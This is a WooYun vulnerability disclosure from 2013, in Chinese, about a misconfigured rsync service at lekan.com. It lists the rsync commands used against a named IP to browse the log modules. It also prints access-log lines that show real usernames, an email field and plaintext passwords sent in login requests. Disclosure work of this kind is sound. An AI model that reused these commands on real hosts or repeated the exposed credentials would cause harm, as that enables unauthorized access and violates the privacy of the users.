当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041102

漏洞标题:乐看运维配置不当导致账号信息泄漏

相关厂商:lekan.com

漏洞作者: 盈盈无绪

提交时间:2013-10-30 12:24

修复时间:2013-12-14 12:24

公开时间:2013-12-14 12:24

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-30: 细节已通知厂商并且等待厂商处理中
2013-10-30: 厂商已经确认,细节仅向厂商公开
2013-11-09: 细节向核心白帽子及相关领域专家公开
2013-11-19: 细节向普通白帽子公开
2013-11-29: 细节向实习白帽子公开
2013-12-14: 细节向公众公开

简要描述:

乐看rsync配置不当,导致用户登陆信息日志外泄,可导致用户名和密码泄漏。

详细说明:

rsync 58.68.228.36::
log-apache
log-resin
log
rsync 58.68.228.36::log/
drwxr-xr-x 16384 2013/10/26 00:33:31 .
-rw-r--r-- 0 2013/10/26 00:00:01 access.log
-rw-r--r-- 40 2013/10/10 00:00:01 access.log.20131010.gz
-rw-r--r-- 40 2013/10/11 00:00:02 access.log.20131011.gz
-rw-r--r-- 40 2013/10/12 00:00:01 access.log.20131012.gz
-rw-r--r-- 40 2013/10/13 00:00:01 access.log.20131013.gz
-rw-r--r-- 40 2013/10/14 00:00:01 access.log.20131014.gz
-rw-r--r-- 40 2013/10/15 00:00:01 access.log.20131015.gz
-rw-r--r-- 40 2013/10/16 00:00:01 access.log.20131016.gz
-rw-r--r-- 40 2013/10/17 00:00:01 access.log.20131017.gz
-rw-r--r-- 40 2013/10/18 00:00:02 access.log.20131018.gz
-rw-r--r-- 40 2013/10/19 00:00:02 access.log.20131019.gz
-rw-r--r-- 40 2013/10/20 00:00:01 access.log.20131020.gz
-rw-r--r-- 40 2013/10/21 00:00:01 access.log.20131021.gz
-rw-r--r-- 40 2013/10/22 00:00:02 access.log.20131022.gz
-rw-r--r-- 40 2013/10/23 00:00:01 access.log.20131023.gz
-rw-r--r-- 0 2013/10/24 00:00:01 access.log.20131024
-rw-r--r-- 0 2013/10/25 00:00:02 access.log.20131025
-rw-r--r-- 2366772343 2013/10/26 12:38:29 account.access.log
-rw-r--r-- 855643692 2013/10/22 00:00:02 account.access.log.20131021.gz
-rw-r--r-- 853403932 2013/10/23 00:00:01 account.access.log.20131022.gz
-rw-r--r-- 881331690 2013/10/24 00:00:01 account.access.log.20131023.gz
-rw-r--r-- 880593919 2013/10/25 00:00:02 account.access.log.20131024.gz
-rw-r--r-- 937778527 2013/10/26 00:00:01 account.access.log.20131025.gz
-rw-r--r-- 560848 2013/10/26 12:20:30 account.error.log
-rw-r--r-- 333736 2013/10/09 23:58:48 account.error.log.20131009.gz
-rw-r--r-- 343256 2013/10/10 23:58:08 account.error.log.20131010.gz
-rw-r--r-- 602582 2013/10/11 23:12:43 account.error.log.20131011.gz
-rw-r--r-- 214814 2013/10/12 23:55:14 account.error.log.20131012.gz
-rw-r--r-- 169849 2013/10/13 23:57:50 account.error.log.20131013.gz
-rw-r--r-- 92550 2013/10/14 23:58:31 account.error.log.20131014.gz
-rw-r--r-- 119241 2013/10/15 23:57:14 account.error.log.20131015.gz
-rw-r--r-- 326838 2013/10/16 22:57:57 account.error.log.20131016.gz
-rw-r--r-- 185847 2013/10/17 23:54:32 account.error.log.20131017.gz
-rw-r--r-- 360899 2013/10/18 23:59:06 account.error.log.20131018.gz
-rw-r--r-- 768237 2013/10/19 23:55:52 account.error.log.20131019.gz
-rw-r--r-- 38931451 2013/10/20 23:59:45 account.error.log.20131020.gz
-rw-r--r-- 32193192 2013/10/21 23:56:10 account.error.log.20131021.gz
-rw-r--r-- 50938238 2013/10/22 23:59:11 account.error.log.20131022.gz
-rw-r--r-- 24364306 2013/10/23 23:55:05 account.error.log.20131023.gz
-rw-r--r-- 426896366 2013/10/24 23:58:41 account.error.log.20131024
-rw-r--r-- 549037614 2013/10/25 23:58:39 account.error.log.20131025


more account.access.log.20131025
"-" - "-" [25/Oct/2013:00:15:09 +0800] "GET /registerByUnameAjax.action?password=gejingxia123&username=jinzhibin&[email protected]&uname=jinzhibin&ck_idfvdid=5F597B7F-4E5D-48E3-8C63-D90F2128EC75&ck_platform=6&ck_height=768&entranceId=9602&ck_did=020000000000&version=1.220&res_ver=2&site=9&ck_odid=e02bda8f826becb7c189220324eeda324d7a8ce3&ck_idfadid=2AFB3DFC-2A95-4404-9488-B2B60E9868A2&ck_sysVer=7.0.2&ck_ua=iPad&ck_width=1024 HTTP/1.1" 499 0 "-" "%E4%B9%90%E7%9C%8B%E5%84%BF%E7%AB%A5%E4%B9%A6/1.220 CFNetwork/672.0.2 Darwin/14.0.0" 0 60.325 183.160.6.161 - OkTkZlJpRthgYWzABC36Ag== "192.168.253.43:8081, 192.168.253.40:8081"
"-" - "-" [25/Oct/2013:14:17:54 +0800] "GET /loginAjax.action?jsoncallback=jQuery17202701507827732712_1382681832902&loginname=1989beyond&password=2013beyond&remember=2&from=androidPad&_=1382681870222 HTTP/1.1" 200 125 "http://kids.lekan.com/desktop/login/" "Mozilla/5.0 (Windows; U; zh-CN) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.9" 294 0.004 182.150.72.109 - OkTkZlJqDKFgTmy/BLqkAg== "192.168.253.40:8081"
"-" - "-" [25/Oct/2013:14:21:30 +0800] "GET /loginAjax.action?loginname=yuhua033&password=123456&remember=2&rnd=0.06405521346279247 HTTP/1.1" 200 197 "http://account.lekan.com/loginAjax.action?loginname=yuhua033&password=123456&remember=2&rnd=0.06405521346279247" "Mozilla/5.0 (compatible; U; AnyEvent-HTTP/2.15; +http://software.schmorp.de/pkg/AnyEvent)" 1091 2.118 113.105.147.134 - - "192.168.253.41:8081"


漏洞证明:

lekan.png

修复方案:

身份认证,ip限制

版权声明:转载请注明来源 盈盈无绪@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-10-30 13:40

厂商回复:

rsync 配置因为临时原因去掉安全限制,没有及时改回;登录需要改为 POST 方式

最新状态:

暂无